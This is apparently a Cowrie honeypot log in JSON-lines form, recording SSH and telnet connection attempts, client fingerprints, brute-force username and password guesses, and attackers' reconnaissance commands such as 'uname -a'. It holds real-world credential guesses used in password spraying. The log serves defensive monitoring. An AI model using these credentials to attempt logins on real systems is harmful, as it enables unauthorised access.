{"eventid":"cowrie.session.closed","duration":12.84423017501831,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:31.076212Z","src_ip":"61.52.51.65","session":"d7234505731b"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":53015,"dst_ip":"1.2.3.4","dst_port":23,"session":"27844d8cecec","protocol":"telnet","message":"New connection: 61.52.51.65:53015 (1.2.3.4:23) [session: 27844d8cecec]","sensor":"my-vps","timestamp":"2025-08-31T07:52:31.305563Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57315,"dst_ip":"1.2.3.4","dst_port":22,"session":"1de33601f274","protocol":"ssh","message":"New connection: 212.227.235.229:57315 (1.2.3.4:22) [session: 1de33601f274]","sensor":"my-vps","timestamp":"2025-08-31T07:52:31.659039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:52:31.687991Z","src_ip":"212.227.235.229","session":"1de33601f274"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:52:31.999857Z","src_ip":"212.227.235.229","session":"1de33601f274"}
{"eventid":"cowrie.login.success","username":"root","password":"globalcbb2021","message":"login attempt [root/globalcbb2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:52:33.501204Z","src_ip":"212.227.125.160","session":"2bd41230cdf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:52:35.959075Z","src_ip":"212.227.125.160","session":"2bd41230cdf8"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T07:52:35.959756Z","src_ip":"212.227.125.160","session":"2bd41230cdf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:36.882482Z","src_ip":"212.227.125.160","session":"2bd41230cdf8"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:36.883619Z","src_ip":"212.227.125.160","session":"2bd41230cdf8"}
{"eventid":"cowrie.login.failed","username":"gabriel","password":"gabriel","message":"login attempt [gabriel/gabriel] failed","sensor":"my-vps","timestamp":"2025-08-31T07:52:38.723272Z","src_ip":"212.227.235.229","session":"1de33601f274"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:39.960142Z","src_ip":"212.227.235.229","session":"1de33601f274"}
{"eventid":"cowrie.session.closed","duration":12.76661491394043,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:44.072062Z","src_ip":"61.52.51.65","session":"27844d8cecec"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":53334,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d5563a845b7","protocol":"telnet","message":"New connection: 61.52.51.65:53334 (1.2.3.4:23) [session: 4d5563a845b7]","sensor":"my-vps","timestamp":"2025-08-31T07:52:44.201556Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":52226,"dst_ip":"1.2.3.4","dst_port":22,"session":"d64444bffef8","protocol":"ssh","message":"New connection: 201.148.180.50:52226 (1.2.3.4:22) [session: d64444bffef8]","sensor":"my-vps","timestamp":"2025-08-31T07:52:46.516365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:52:47.572237Z","src_ip":"201.148.180.50","session":"d64444bffef8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:52:47.572994Z","src_ip":"201.148.180.50","session":"d64444bffef8"}
{"eventid":"cowrie.login.success","username":"root","password":"globalcbb2021","message":"login attempt [root/globalcbb2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:52:54.080678Z","src_ip":"201.148.180.50","session":"d64444bffef8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:52:56.665235Z","src_ip":"201.148.180.50","session":"d64444bffef8"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T07:52:56.665903Z","src_ip":"201.148.180.50","session":"d64444bffef8"}
{"eventid":"cowrie.session.closed","duration":12.838719129562378,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:57.040196Z","src_ip":"61.52.51.65","session":"4d5563a845b7"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":53640,"dst_ip":"1.2.3.4","dst_port":23,"session":"825a96043db6","protocol":"telnet","message":"New connection: 61.52.51.65:53640 (1.2.3.4:23) [session: 825a96043db6]","sensor":"my-vps","timestamp":"2025-08-31T07:52:57.248289Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:57.907489Z","src_ip":"201.148.180.50","session":"d64444bffef8"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:57.908704Z","src_ip":"201.148.180.50","session":"d64444bffef8"}
{"eventid":"cowrie.session.closed","duration":12.796438217163086,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:53:10.044660Z","src_ip":"61.52.51.65","session":"825a96043db6"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":53949,"dst_ip":"1.2.3.4","dst_port":23,"session":"6500258f3c14","protocol":"telnet","message":"New connection: 61.52.51.65:53949 (1.2.3.4:23) [session: 6500258f3c14]","sensor":"my-vps","timestamp":"2025-08-31T07:53:10.226284Z"}
{"eventid":"cowrie.session.closed","duration":12.811739206314087,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:53:23.037954Z","src_ip":"61.52.51.65","session":"6500258f3c14"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":54265,"dst_ip":"1.2.3.4","dst_port":23,"session":"a56651d71b03","protocol":"telnet","message":"New connection: 61.52.51.65:54265 (1.2.3.4:23) [session: a56651d71b03]","sensor":"my-vps","timestamp":"2025-08-31T07:53:23.191572Z"}
{"eventid":"cowrie.session.closed","duration":12.845645666122437,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:53:36.037147Z","src_ip":"61.52.51.65","session":"a56651d71b03"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":54606,"dst_ip":"1.2.3.4","dst_port":23,"session":"a0646266bebd","protocol":"telnet","message":"New connection: 61.52.51.65:54606 (1.2.3.4:23) [session: a0646266bebd]","sensor":"my-vps","timestamp":"2025-08-31T07:53:36.238201Z"}
{"eventid":"cowrie.session.closed","duration":12.82278299331665,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:53:49.060905Z","src_ip":"61.52.51.65","session":"a0646266bebd"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":54924,"dst_ip":"1.2.3.4","dst_port":23,"session":"997cbe4dc247","protocol":"telnet","message":"New connection: 61.52.51.65:54924 (1.2.3.4:23) [session: 997cbe4dc247]","sensor":"my-vps","timestamp":"2025-08-31T07:53:49.282389Z"}
{"eventid":"cowrie.session.closed","duration":12.772409915924072,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:54:02.054732Z","src_ip":"61.52.51.65","session":"997cbe4dc247"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":55224,"dst_ip":"1.2.3.4","dst_port":23,"session":"63305b525b6f","protocol":"telnet","message":"New connection: 61.52.51.65:55224 (1.2.3.4:23) [session: 63305b525b6f]","sensor":"my-vps","timestamp":"2025-08-31T07:54:02.219461Z"}
{"eventid":"cowrie.session.closed","duration":12.814502716064453,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:54:15.033871Z","src_ip":"61.52.51.65","session":"63305b525b6f"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":55536,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b20ad6a26a5","protocol":"telnet","message":"New connection: 61.52.51.65:55536 (1.2.3.4:23) [session: 3b20ad6a26a5]","sensor":"my-vps","timestamp":"2025-08-31T07:54:15.259885Z"}
{"eventid":"cowrie.session.closed","duration":12.801406860351562,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:54:28.061224Z","src_ip":"61.52.51.65","session":"3b20ad6a26a5"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":55835,"dst_ip":"1.2.3.4","dst_port":23,"session":"8a9936031199","protocol":"telnet","message":"New connection: 61.52.51.65:55835 (1.2.3.4:23) [session: 8a9936031199]","sensor":"my-vps","timestamp":"2025-08-31T07:54:28.208245Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60829,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ef80381b165","protocol":"ssh","message":"New connection: 212.227.125.160:60829 (1.2.3.4:22) [session: 4ef80381b165]","sensor":"my-vps","timestamp":"2025-08-31T07:54:32.218603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:54:32.598448Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:54:32.657578Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.login.failed","username":"admin","password":"twins2","message":"login attempt [admin/twins2] failed","sensor":"my-vps","timestamp":"2025-08-31T07:54:32.978094Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.login.failed","username":"admin","password":"triplets","message":"login attempt [admin/triplets] failed","sensor":"my-vps","timestamp":"2025-08-31T07:54:34.039878Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.login.failed","username":"admin","password":"timothy1","message":"login attempt [admin/timothy1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:54:35.102576Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.login.failed","username":"admin","password":"timelord","message":"login attempt [admin/timelord] failed","sensor":"my-vps","timestamp":"2025-08-31T07:54:36.166144Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.login.failed","username":"admin","password":"thriller","message":"login attempt [admin/thriller] failed","sensor":"my-vps","timestamp":"2025-08-31T07:54:37.228361Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:54:38.291369Z","src_ip":"212.227.125.160","session":"4ef80381b165"}
{"eventid":"cowrie.session.closed","duration":12.84573769569397,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:54:41.053911Z","src_ip":"61.52.51.65","session":"8a9936031199"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":56139,"dst_ip":"1.2.3.4","dst_port":23,"session":"121c504c38df","protocol":"telnet","message":"New connection: 61.52.51.65:56139 (1.2.3.4:23) [session: 121c504c38df]","sensor":"my-vps","timestamp":"2025-08-31T07:54:41.223196Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56808,"dst_ip":"1.2.3.4","dst_port":23,"session":"d779457ef950","protocol":"telnet","message":"New connection: 212.227.235.229:56808 (1.2.3.4:23) [session: d779457ef950]","sensor":"my-vps","timestamp":"2025-08-31T07:54:44.798684Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:54:44.986288Z","src_ip":"212.227.235.229","session":"d779457ef950"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:54:45.002143Z","src_ip":"212.227.235.229","session":"d779457ef950"}
{"eventid":"cowrie.session.closed","duration":12.747704982757568,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:54:53.970829Z","src_ip":"61.52.51.65","session":"121c504c38df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54060,"dst_ip":"1.2.3.4","dst_port":23,"session":"36bbb442cc6d","protocol":"telnet","message":"New connection: 212.227.235.229:54060 (1.2.3.4:23) [session: 36bbb442cc6d]","sensor":"my-vps","timestamp":"2025-08-31T07:55:05.709476Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:55:06.073774Z","src_ip":"212.227.235.229","session":"36bbb442cc6d"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:55:07.481590Z","src_ip":"212.227.235.229","session":"36bbb442cc6d"}
{"eventid":"cowrie.session.closed","duration":2.438002109527588,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:55:08.147409Z","src_ip":"212.227.235.229","session":"36bbb442cc6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55304,"dst_ip":"1.2.3.4","dst_port":23,"session":"f4e142dfbf37","protocol":"telnet","message":"New connection: 212.227.235.229:55304 (1.2.3.4:23) [session: f4e142dfbf37]","sensor":"my-vps","timestamp":"2025-08-31T07:55:08.304167Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:55:08.693517Z","src_ip":"212.227.235.229","session":"f4e142dfbf37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:55:09.117884Z","src_ip":"212.227.235.229","session":"f4e142dfbf37"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-31T07:55:09.195179Z","src_ip":"212.227.235.229","session":"f4e142dfbf37"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T07:55:09.317210Z","src_ip":"212.227.235.229","session":"f4e142dfbf37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","size":514,"shasum":"2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:55:10.426609Z","src_ip":"212.227.235.229","session":"f4e142dfbf37"}
{"eventid":"cowrie.session.closed","duration":2.126694917678833,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:55:10.430795Z","src_ip":"212.227.235.229","session":"f4e142dfbf37"}
{"eventid":"cowrie.session.connect","src_ip":"49.212.231.78","src_port":48412,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2218cd06f1c","protocol":"ssh","message":"New connection: 49.212.231.78:48412 (1.2.3.4:22) [session: a2218cd06f1c]","sensor":"my-vps","timestamp":"2025-08-31T07:55:51.522322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:55:51.523126Z","src_ip":"49.212.231.78","session":"a2218cd06f1c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T07:55:51.795629Z","src_ip":"49.212.231.78","session":"a2218cd06f1c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:55:59.523493Z","src_ip":"49.212.231.78","session":"a2218cd06f1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3787,"dst_ip":"1.2.3.4","dst_port":22,"session":"e57431121467","protocol":"ssh","message":"New connection: 212.227.235.229:3787 (1.2.3.4:22) [session: e57431121467]","sensor":"my-vps","timestamp":"2025-08-31T07:57:00.971377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:57:00.973043Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:57:01.098069Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:57:01.680383Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-31T07:57:02.807467Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1234","message":"login attempt [admin/admin1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:57:03.934637Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-31T07:57:05.080009Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Xpon@Olt9417#","message":"login attempt [admin/Xpon@Olt9417#] failed","sensor":"my-vps","timestamp":"2025-08-31T07:57:06.207511Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:57:07.335691Z","src_ip":"212.227.235.229","session":"e57431121467"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:57:45.030186Z","src_ip":"212.227.235.229","session":"d779457ef950"}
{"eventid":"cowrie.session.closed","duration":180.23522281646729,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:57:45.033816Z","src_ip":"212.227.235.229","session":"d779457ef950"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":27047,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3843b3dfd8c","protocol":"ssh","message":"New connection: 185.246.128.133:27047 (1.2.3.4:22) [session: b3843b3dfd8c]","sensor":"my-vps","timestamp":"2025-08-31T07:57:56.169044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-WinSCP_release_5.1.3","message":"Remote SSH version: SSH-2.0-WinSCP_release_5.1.3","sensor":"my-vps","timestamp":"2025-08-31T07:57:56.169916Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
